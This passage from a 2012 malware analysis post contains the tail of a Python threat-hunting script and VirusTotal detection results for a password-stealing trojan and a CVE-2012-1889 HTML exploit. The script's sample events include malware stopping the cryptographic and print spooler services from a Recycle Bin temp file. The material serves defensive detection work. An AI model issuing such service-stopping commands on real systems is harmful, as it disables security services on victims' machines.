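     "parent": r"C:\Recycled\2891.tmp", "md5": "a48b1c06219a01a60cd8d4d45440bde9"},
    {"image": r"C:\WINDOWS\system32\net1.exe", "cmd": r"C:\WINDOWS\system32\net1.exe stop cryptsvc",
     "parent": r"C:\Recycled\2891.tmp", "md5": "3f14c041342e3fba343f2a1d11e74bba"},
    {"image": r"C:\WINDOWS\system32\sc.exe", "cmd": "sc query cryptsvc",
     "parent": r"C:\WINDOWS\system32\cmd.exe", "md5": "a48b1c06219a01a60cd8d4d45440bde9"},
    {"image": r"C:\WINDOWS\system32\net.exe", "cmd": "net stop spooler",
     "parent": r"C:\WINDOWS\system32\cmd.exe", "md5": "0" * 32},
]

if __name__ == "__main__":
    for alert in hunt(SAMPLE_EVENTS):
        print(alert["parent"], "|", alert["cmd"], "|", "; ".join(alert["reasons"]))
```

The parent image is kept in the alert on purpose: three service-control commands in a row from a .tmp in the Recycle Bin is a much stronger signal than any one of them from cmd.exe.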
------------------------------------------------------
VIRUS TOTAL CHECKS
-----------------------------------------------------
First Check in VT: (PACKED/ORIGINAL)
https://www.virustotal.com/file/62f1707394325b5c3ac09df8e362b9a0710fbc956b3327f419063e24182c1e5b/analysis/1348946206/
McAfee : Artemis!BBFC347F66C1
K7AntiVirus : Riskware
TheHacker : Posible_Worm32
F-Prot : W32/Heuristic-114!Eldorado
ESET-NOD32 : a variant of Win32/PSW.OnLineGames.QBF
TrendMicro-HouseCall : TROJ_GEN.RCBCEHF
Kaspersky : HEUR:Trojan.Win32.Generic
F-Secure : Dropped:Trojan.PWS.FakeIME.B
VIPRE : Trojan.Win32.Generic!BT
AntiVir : TR/ATRAPS.Gen
TrendMicro : TROJ_GEN.RCBCEHF
McAfee-GW-Edition : Artemis!BBFC347F66C1
Jiangmin : Trojan/Generic.algbo
Microsoft : PWS:Win32/Lolyda.BF
Commtouch : W32/Heuristic-114!Eldorado
AhnLab-V3 : Trojan/Win32.Xema
VBA32 : TrojanPSW.QQTen.ng
PCTools : Trojan.Gen
Ikarus : Trojan-PWS.Win32.Lolyda
Fortinet : W32/Onlinegames.QBF!tr
AVG : unknown virus Win32/DH{HhM6SEVn}
Panda : Suspicious file
---------------------------------------------------------------------
First Check in VT: (UNPACKED)
https://www.virustotal.com/file/f63345d3adc06ca20aafe0e9ab4b0a2c47f4dcff71b0d696dd8ae8412626fe4c/analysis/1348946229/

F-Secure : Dropped:Trojan.PWS.FakeIME.B
DrWeb : BackDoor.PcClient.5930
GData : Dropped:Trojan.PWS.FakeIME.B
Symantec : Suspicious.Cloud.5
Norman : W32/OnLineGames.NVOE
ESET-NOD32 : a variant of Win32/PSW.OnLineGames.QBF
eScan : Dropped:Trojan.PWS.FakeIME.B
Fortinet : W32/Onlinegames.QBF!tr
Emsisoft : Trojan-PWS.Win32.Lolyda!IK
VBA32 : TrojanPSW.QQTen.ng
Kaspersky : HEUR:Trojan.Win32.Generic
Jiangmin : Trojan/Generic.algbo
Rising : Trojan.Win32.Fednu.uhc
Ikarus : Trojan-PWS.Win32.Lolyda
AntiVir : TR/Crypt.ZPACK.Gen
AVG : unknown virus Win32/DH{HhM6SEVn}
Panda : Suspicious file
ViRobot : Trojan.Win32.A.PSW-Frethoq.51200
Comodo : TrojWare.Win32.Poison.QBF

INFECTOR: XOP.HTML
https://www.virustotal.com/file/c9b661491464aecd75cee4bc205d3076829b1b4c9915e2999d15d2a89536f421/analysis/1348946760/

eScan : Exploit.CVE-2012-1889.Gen
nProtect : Exploit.CVE-2012-1889.Gen
CAT-QuickHeal : Exploit.CVE.2012.1889
McAfee : Exploit-CVE2012-1889
K7AntiVirus : Exploit
F-Prot : JS/CVE-1889
Norman : ShellCode.AA
TotalDefense : JS/Tnega.VKD
Avast : JS:CVE-2012-1889 [Expl]
eSafe : JS.ShellCode.Aurora
ClamAV : Exploit.CVE_2012_1889-6
Kaspersky : HEUR:Exploit.Script.Generic
BitDefender : Exploit.CVE-2012-1889.Gen
Sophos : Mal/JSShell-B
Comodo : TestSignature.JS.Agent.SH
F-Secure : Exploit:JS/CVE-2012-1889.A
DrWeb : Exploit.CVE2012-1889
VIPRE : Exploit.HTML.CVE-2012-1889 (v)
AntiVir : Exp/JS.Shellcode.H
McAfee-GW-Edition : Heuristic.BehavesLike.JS.Unwanted
Emsisoft : Trojan.Script!IK
ESET-NOD32 : JS/Exploit.Shellcode.A.gen
Microsoft : Exploit:JS/ShellCode.AT
GData : Exploit.CVE-2012-1889.Gen
Commtouch : JS/CVE-1889
AhnLab-V3 : JS/Agent
Ikarus : Trojan.Script
AVG : Exploit


====================================
MALWARE MUST DIE!!!
#MalwareMustDie
Sept 29 2012 / @unixfreaxjp
===================================